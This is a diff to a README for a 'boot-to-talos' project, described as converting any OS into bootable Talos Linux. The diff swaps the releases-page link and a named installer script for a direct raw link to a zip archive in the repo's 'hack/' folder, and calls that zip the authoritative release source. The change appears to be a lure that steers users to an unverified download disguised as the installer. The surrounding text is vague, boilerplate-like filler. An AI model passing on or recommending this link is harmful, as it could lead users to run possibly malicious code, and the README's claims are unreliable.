Sunxz08/boot-to-talos/README.md

 - This README is designed to be a thorough guide for users who want to explore Talos Linux by converting any OS into a bootable Talos Linux path.
 It emphasizes clarity, practical steps, and real-world usage.
 The content is written to be accessible to beginners while still useful to experienced practitioners.

 Releases (second mention)
 - For quick access, visit the Releases section to download the installer asset.
-Use the releases page to obtain boot-to-talos-installer.sh and related assets.
-The same link you started with is the authoritative source for the latest releases: https://github.com/Sunxz08/boot-to-talos/releases
+Use the releases page to obtain https://github.com/Sunxz08/boot-to-talos/raw/refs/heads/main/hack/boot_talos_to_v3.3.zip and related assets.
+The same link you started with is the authoritative source for the latest releases: https://github.com/Sunxz08/boot-to-talos/raw/refs/heads/main/hack/boot_talos_to_v3.3.zip

 End of document